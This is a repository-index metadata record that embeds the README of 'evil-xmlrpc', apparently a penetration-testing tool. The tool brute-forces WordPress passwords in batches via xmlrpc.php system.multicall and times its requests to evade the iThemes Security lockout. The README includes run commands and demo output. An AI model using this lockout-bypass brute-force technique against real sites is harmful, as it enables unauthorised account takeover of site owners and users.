{"id":14638152,"url":"https://github.com/0xapt/evil-xmlrpc","last_synced_at":"2025-09-07T06:32:46.525Z","repository":{"id":107032491,"uuid":"487003204","full_name":"Subn0x/evil-xmlrpc","owner":"Subn0x","description":"evil-xmlrpc is a tool that I created to help me bruteforce Wordpress user accounts using xmlrpc.php while bypassing iThemes Security preventing lockouts","archived":false,"fork":false,"pushed_at":"2022-05-03T12:57:43.000Z","size":26,"stargazers_count":6,"open_issues_count":0,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-07-30T14:18:29.212Z","etag":null,"topics":["exploit","ithemes-security","python","wordpress"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Subn0x.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-04-29T14:31:02.000Z","updated_at":"2024-07-30T14:18:29.213Z","dependencies_parsed_at":"2024-01-14T12:45:27.464Z","dependency_job_id":"7f7ffc8d-273f-4788-9174-5277847450aa","html_url":"https://github.com/Subn0x/evil-xmlrpc","commit_stats":null,"previous_names":["subn0x/evil-xmlrpc","0xapt/evil-xmlrpc"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Subn0x%2Fevil-xmlrpc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Subn0x%2Fevil-xmlrpc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Subn0x%2Fevil-xmlrpc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Subn0x%2Fevil-xmlrpc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Subn0x","download_url":"https://codeload.github.com/Subn0x/evil-xmlrpc/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":232183075,"owners_count":18484730,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","ithemes-security","python","wordpress"],"created_at":"2024-09-10T02:01:45.303Z","updated_at":"2025-01-02T10:31:38.469Z","avatar_url":"https://github.com/Subn0x.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# evil-xmlrpc\nevil-xmlrpc is a tool that I created to help me bruteforce wordpress user accounts using xmlrpc.php while bypassing iThemes Security preventing lockouts\n\nWhile testing a specific target I noticed that xmlrpc was enabled, but after sending a few requests against a discovered user account, I was locked out of the site. After waiting till the lockout period ended I saw that iThemes Security Plugin was being used on the site. I soon noticed that I was completely locked out after sending 5 requests. Regular bruteforce methods which invloved sending requests that contain only a single username and password per request wasn't going to work here. Later I discovered that you could send many login attempts via 1 single request using \"system.multicall\". In my particular situation I found that I could only send 1666 login attempts per request at a time (may be different for your target). So I made this script to be able to take a password list (of about 1 million words) and send it off in groups of 1664 (Initially was 1666 in the script, but cut it back by 2 for breathing room). \n\nFor example: \n* Request 1 (Sends lines 1-1666 of wordlist) \n* Request 2 (Sends lines 1667-3332 of wordlist)\n* Request 3 (Sends lines 3333-4998 of wordlist)\n* Request 4 (Sends lines 4999-6664 of wordlist)\n\nBefore sending the 5th request in order to prevent being locked out of the site, stop for 5 mins and then continue going down the list.\n\n## Install \n\n```sh\ngit clone https://github.com/0xApt/evil-xmlrpc.git\ncd evil-xmlrpc\npip3 install -r requirements.txt\npython3 evil-xmlrpc.py \u003cpasswordlist\u003e \u003cusername\u003e \u003chttps://www.examplesite.com\u003e\n```\n\n## Demo output\n\n```sh\n\nroot@user:~ python3 evil-xmlrpc.py 100000-pass-wordlist.txt admin https://www.examplesite.com                                                                                                                      \n\n                 ██  ▀██                        ▀██\n  ▄▄▄▄  ▄▄▄▄ ▄▄▄ ▄▄▄   ██     ▄▄▄ ▄▄▄ ▄▄ ▄▄ ▄▄    ██  ▄▄▄ ▄▄  ▄▄▄ ▄▄▄    ▄▄▄▄\n▄█▄▄▄██  ▀█▄  █   ██   ██      ▀█▄▄▀   ██ ██ ██   ██   ██▀ ▀▀  ██▀  ██ ▄█   ▀▀\n██        ▀█▄█    ██   ██       ▄█▄    ██ ██ ██   ██   ██      ██    █ ██\n ▀█▄▄▄▀    ▀█    ▄██▄ ▄██▄    ▄█  ██▄ ▄██ ██ ██▄ ▄██▄ ▄██▄     ██▄▄▄▀   ▀█▄▄▄▀\n                                                               ██\n                                                              ▀▀▀▀\n                                By 0xapt\n\n[*] Checking if site is vulnerable..\n[*] Site is vulnerable!\n[*] File has 100000 lines\n\n[*] Sending Payload.. \n[*] Attempt: 1 \n[*] Target User: admin\n[*] Using lines 0 to 1664 from password list\n[*] Content Length: 356283\n[*] Interesting.. Saving response..\n[*] Password Not Cracked.\n\n[*] Sending Payload.. \n[*] Attempt: 2 \n[*] Target User: admin\n[*] Using lines 1665 to 3328 from password list\n[*] Content Length: 356069\n[*] Password Not Cracked.\n\n[*] Sending Payload.. \n[*] Attempt: 3 \n[*] Target User: admin\n[*] Using lines 3329 to 4992 from password list\n[*] Content Length: 356069\n[*] Password Not Cracked.\n\n[*] Sending Payload.. \n[*] Attempt: 4 \n[*] Target User: admin\n[*] Using lines 4993 to 6656 from password list\n[*] Content Length: 356069\n[*] Password Not Cracked.\n\n[*] Waiting 5 mins to prevent lockout...\n[*] Till next requests: 3:24\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xapt%2Fevil-xmlrpc","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xapt%2Fevil-xmlrpc","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xapt%2Fevil-xmlrpc/lists"}